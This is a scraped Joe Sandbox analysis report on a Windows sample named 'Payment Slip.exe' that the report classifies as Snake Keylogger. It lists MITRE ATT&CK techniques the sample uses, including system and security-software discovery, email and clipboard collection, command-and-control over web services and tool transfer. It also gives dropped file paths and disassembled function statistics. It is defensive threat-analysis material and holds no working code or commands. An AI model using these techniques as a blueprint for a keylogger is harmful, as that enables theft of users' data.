Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Slip.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Masculinity.exe

C:\Users\user\AppData\Local\Temp\Masculinity.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzkdiry2.t22.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm21usp2.sdq.psm1

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Krnemlk.Cig255

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt

C:\Users\user\AppData\Local\Temp\nsw288F.tmp

Windows Analysis Report
Payment Slip.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00402DBA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre